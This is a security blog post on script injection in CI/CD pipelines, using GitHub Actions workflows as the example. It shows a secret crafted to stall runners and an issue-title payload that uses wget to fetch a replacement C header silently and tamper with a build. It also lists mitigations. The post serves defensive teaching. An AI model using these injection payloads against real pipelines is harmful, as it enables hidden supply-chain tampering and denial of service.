Over the last few years, several DevOps platforms have established themselves as standard choices for personal and enterprise use. Most of them offer CI/CD capabilities, since CI/CD is one of the core practices of modern software development.

While CI/CD has enabled significant advances for developers, it also raises security concerns around distributed operations. Code is often executed on remote ‘agent’ machines, which imposes new requirements on how sensitive data is handled throughout the pipeline while the developer works on a different workstation. In addition, automation requires non-interactive operations driven by dynamic inputs, variables, or secret values.

For this post, I will be using GitHub to illustrate how to abuse inputs and inject UNIX commands into a traditional development pipeline.

Disclaimer: even though my research has been performed on GitHub, any platform using non-sanitized inputs on pipelines may be subject to this kind of attack.

Inputs

Inputs are accessed in CI/CD .yml files through expression substitution. In GitHub Actions workflows, they are enclosed in ${{ }}, and the platform replaces each expression with its value before the step runs.

There are many inputs available:

- Accessing the title of a Pull Request or Issue event: ${{ github.event.pull_request.title }}, ${{ github.event.issue.title }}

- Accessing a secret: ${{ secrets.NAME }}

- Accessing an output value of a step: ${{ steps.<step_id>.outputs.<output_name> }}

Secrets



A secret promises a permanently hidden value: the sensitive information is obscured, yet the pipeline still uses it as a black box. Because inputs are not sanitized, a secret may hold unexpected content, which can trigger arbitrary operations once it is substituted into the CI/CD pipeline, silently and without an audit trail.

Due to the level of access required to change secrets (usually administrative), the attack surface for secrets is smaller than for other inputs.



Secret behavior on pipeline logs

Platforms redact any occurrence of a secret's value that appears in the logs after execution. On GitHub, a plain echo ${{ secrets.EXAMPLE }} prints three asterisks (***) in place of the value.

The redaction also applies when the value reaches the log through another command:

    echo ${{ secrets.EXAMPLE }} > output.txt && cat output.txt

This line results in the same redaction.
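To make the redaction behavior concrete, here is a minimal sketch of a log filter that masks every literal occurrence of a secret. It is only a model of the observed behavior, not GitHub's implementation; the redact function and the value hunter2 are hypothetical names chosen for the illustration.

```shell
#!/bin/sh
# Hypothetical log filter: replaces every literal occurrence of the secret
# with ***. This models the observed behavior only.
redact() {
    # $1: secret value (assumed to contain no backslashes); stdin: raw log lines
    awk -v secret="$1" '
    {
        # An empty secret would match everywhere, so pass the line through.
        if (secret == "") { print; next }
        line = $0
        out = ""
        # Copy the text before each match, then emit the mask instead of the match.
        while ((pos = index(line, secret)) > 0) {
            out = out substr(line, 1, pos - 1) "***"
            line = substr(line, pos + length(secret))
        }
        print out line
    }'
}

EXAMPLE='hunter2'   # hypothetical secret value

# Direct use of the secret in a command.
echo "$EXAMPLE" | redact "$EXAMPLE"

# Indirect use: the value passes through a file before reaching the log.
tmpfile=$(mktemp)
echo "$EXAMPLE" > "$tmpfile" && cat "$tmpfile" | redact "$EXAMPLE"
rm -f "$tmpfile"
```

Both commands print the mask, because the filter works on the text of the log and not on the command that produced it.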



Script injection through secrets



This is the input form for defining a secret on GitHub.

As shown, the form places no restrictions on content type, length, whitespace, or special characters. The secret can be as short as a single character or a very long string. In my tests, it only failed at around 350-400 lines of enwik8.

This is a sample workflow file.

    name: Generic enterprise workflow
    on:
      push:
    jobs:
      Run-command-with-injected-secret:
        name: Run echo with a secret
        runs-on: ubuntu-latest
        steps:
          - run: echo ${{ secrets.LOGIN_TOKEN }}

As seen above, the job will execute echo with a secret parameter. We are expecting the value for LOGIN_TOKEN to be a string, but since this is not enforced, we could use the secret to inject an invisible command.
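The mechanism can be reproduced locally with a small sketch. It assumes the substitution is purely textual and happens before the shell parses the step, which is what the behavior above suggests. The functions render_step and run_step and the marker __SECRET__ are hypothetical stand-ins for the platform's expression handling, and a harmless echo plays the role of the injected command.

```shell
#!/bin/sh
# Hypothetical stand-in for the platform's expression substitution: the
# placeholder is replaced textually, before any shell sees the script.
render_step() {
    # $1: step template containing the literal marker __SECRET__ exactly once
    # $2: value stored in the secret
    template=$1
    value=$2
    # Split the template around the marker and paste the value in between.
    printf '%s%s%s\n' "${template%%__SECRET__*}" "$value" "${template#*__SECRET__}"
}

# Render the step, then hand the resulting text to a shell, as a runner would.
run_step() {
    render_step "$1" "$2" | sh
}

# Benign secret: echo prints the value.
run_step 'echo __SECRET__' 'abc123'

# Crafted secret: the text after ';' is parsed as a second command.
run_step 'echo __SECRET__' 'abc123; echo injected-command-ran'
```

The second call prints the token and then runs the extra command, even though the step template is identical in both calls.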

A more interesting operation is to force a silent Denial of Service (DoS) on a runner by appending a sleep command to the secret. Consider the following workflow, where an API token is stored in a secret and used in a curl request against a real public API.

name: Binance 24h tracker

on:

push:

jobs:

retrieve-data:

name: Retrieving ETH/BTC data

runs-on: ubuntu-latest

steps:



- run: API_TOKEN=${{ secrets.API_TOKEN }} && curl -XGET https://api2.binance.com/api/v3/ticker/24hr -H "Authorization:\ $API_TOKEN"When defining the API_TOKEN secret, we have done it as:

As a result, the runner stalls until the job times out or someone cancels it, which usually takes a long time. The attack cannot be diagnosed from the logs or from the workflow YAML file: the secret is redacted in the former and absent from the latter. Users can spend hours before realizing what is happening, because the diagnosis rests on intuition rather than evidence.
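The stall can be sketched locally without touching a real API. The secret value below is hypothetical (a placeholder token followed by a 2-second sleep, where a real attack would use a far longer delay), curl is replaced by echo so that no request is made, and __SECRET__ is an assumed marker for the substitution point.

```shell
#!/bin/sh
# Hypothetical secret value: a placeholder token followed by an injected sleep.
SECRET_VALUE='tok_example && sleep 2'

# The step line from the workflow, with curl replaced by echo so that the
# sketch makes no network request. __SECRET__ marks the substitution point.
STEP='API_TOKEN=__SECRET__ && echo "Authorization: $API_TOKEN"'

# Textual substitution, as assumed for the ${{ }} expression.
rendered="${STEP%%__SECRET__*}${SECRET_VALUE}${STEP#*__SECRET__}"

start=$(date +%s)
output=$(printf '%s\n' "$rendered" | sh)
end=$(date +%s)

echo "step output: $output"
echo "elapsed seconds: $((end - start))"
```

The step still produces its normal output with the correct token, which is why nothing looks wrong afterwards; only the elapsed time reveals the injected delay.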

Script injection over Pull Requests and Issues

The following code defines a workflow where a repository is checked out (its branch content is downloaded locally inside the runner), using the GitHub Action checkout. After that step, it performs a simple C compilation using gcc. Finally, it runs an echo line to test the application.

name: Simple Compiler

on:

push:

jobs:

compile-proj:

name: Compiling project

runs-on: ubuntu-latest

steps:

- uses: actions/checkout@v3

with:

repository: 'piartz/wargame-rollstats.git'

ref: 'main'

- run: gcc -Wall src/main.c -o war_roll



- run: echo "Now testing the app:" && ./war_rollThis library is intended to perform operations based on dice rolls, calculating the statistic success ratio of achieving a result of X or more. For the example execution, it has been defined to calculate the success ratio of getting a 6 on a 6-sided dice (d6). The code for this C application is publicly available and can be found here.

The first run with this configuration delivers a valid result.

What if we let a GitHub issue set the name of the compiled binary, through a COMPILATION_NAME variable?

name: Simple Compiler

on:

issues:

types: [opened]

jobs:

compile-proj-mal:

name: Malicious compilation

runs-on: ubuntu-latest

steps:

- uses: actions/checkout@v3

with:

repository: 'piartz/wargame-rollstats.git'

ref: 'main'

- run: |

COMPILATION_NAME=${{ github.event.issue.title }}

gcc -Wall src/main.c -o $COMPILATION_NAME



echo "Now testing the app:" && ./$COMPILATION_NAMENow let’s feed COMPILATION_NAME with an interesting GitHub Issues title:

war_exec && wget https://raw.githubusercontent.com/piartz/actions-phishing-demo/main/malicious_c.h &> /dev/null && mv malicious_c.h include/warfunct.h

This names the compiled binary war_exec, downloads a copy of malicious_c.h, and replaces the original warfunct.h with the new file. It also redirects the stdout and stderr of the wget command to /dev/null (&> /dev/null), so that the download leaves no trace in the logs.



The program compiles as usual, but the sample result has been tampered with:

This injection could have been mitigated by defining COMPILATION_NAME as an env variable for the job. The title then reaches the shell as the value of an environment variable instead of being pasted into the script text, so the job simply processes it as a string. It is therefore good practice to do so whenever a value is derived from a dynamic input in CI/CD.
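The difference between the two approaches can be sketched at the shell level. The title below is hypothetical and uses a harmless echo as its payload; run_unsafe and run_safe are illustrative names, and the first one assumes that an expression inside a run: block is pasted into the script as text.

```shell
#!/bin/sh
# Hypothetical malicious issue title; a harmless echo stands in for the payload.
TITLE='war_exec && echo injected-command-ran'

# Unsafe: the title is pasted into the script text, which is what a ${{ }}
# expression inside a run: block amounts to.
run_unsafe() {
    printf 'COMPILATION_NAME=%s\necho "binary name: $COMPILATION_NAME"\n' "$1" | sh
}

# Safer: the script text is fixed and the title travels in the environment,
# so the shell only ever sees it as the value of a variable.
run_safe() {
    printf 'echo "binary name: $COMPILATION_NAME"\n' | COMPILATION_NAME="$1" sh
}

echo "--- unsafe ---"
run_unsafe "$TITLE"
echo "--- safe ---"
run_safe "$TITLE"
```

In the unsafe variant the payload runs and the variable ends up holding only war_exec. In the safe variant the whole title is printed as a plain string. When the variable is later used as an argument, it should still be quoted ("$COMPILATION_NAME") so that the shell does not split it into several words.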

How to mitigate attacks on inputs

What DevOps platforms can do

While many input types can be secured consistently when users follow best practices, platforms can harden input security by changing several aspects of their implementation. Once again, script injection is not specific to GitHub; other platforms may suffer from a similar design.

For many inputs, the basic defense against script injection is to make sure that the value matches a predefined content type. Is it an integer? Then fail when a string appears in the input. Is it a string? Then parse it so that any attempt to run a command is escaped. Types must be publicly visible and auditable, and freeform inputs must be limited, forbidden, or at least well monitored.

Beyond type checks, we could establish limits such as input length for some specific types of secrets. We can be certain about the length of secrets such as hashes, some API keys, or a 6-digit PIN.
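As a rough illustration of such checks, the sketch below validates a value before it is used. The function names and the allowed character set are assumptions made for this example; no platform is known to expose them in this form.

```shell
#!/bin/sh
# Succeeds only if $1 is a non-empty string of decimal digits.
is_integer() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Succeeds only if $1 is exactly $2 characters long (for example a 6-digit PIN).
has_length() {
    [ "${#1}" -eq "$2" ]
}

# Succeeds only if $1 contains nothing but letters, digits, '_', '.' and '-'.
# The allowed set is an assumption; a real policy would be defined per input.
is_plain_name() {
    case $1 in
        ''|*[!A-Za-z0-9_.-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hypothetical candidate values, two benign and two carrying a payload.
for candidate in '123456' '12; sleep 9' 'war_exec' 'war_exec && wget x'; do
    if is_plain_name "$candidate"; then
        echo "accepted: $candidate"
    else
        echo "rejected: $candidate"
    fi
done
```

The checks reject a value outright instead of trying to repair it, which keeps the rule easy to audit: anything containing a space, a semicolon, or an ampersand never reaches the command line.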

Lastly, allowing non-secret variables to be defined in a similar way to secrets can reduce the bad practice of using secrets as regular, reusable values.

What users can do

- An adequate access policy for secrets and write permissions on repositories can drastically reduce the attack surface.

- Define inputs as intermediate environment variables: the value then reaches the shell as data and is not parsed as part of the script, even when it contains an injection attempt.

- Use predefined, closed functions (for example, GitHub Actions) instead of shell commands whenever possible.

- Avoid defining secrets with cloud provider credentials if another method for authentication is available, for example, OpenID Connect.

- Use supply chain security scanning tools such as OpenSSF Scorecard.

- Set up monitoring tools for your environment, and create log alerts for any suspicious permission change, recording which user or app performed the operation.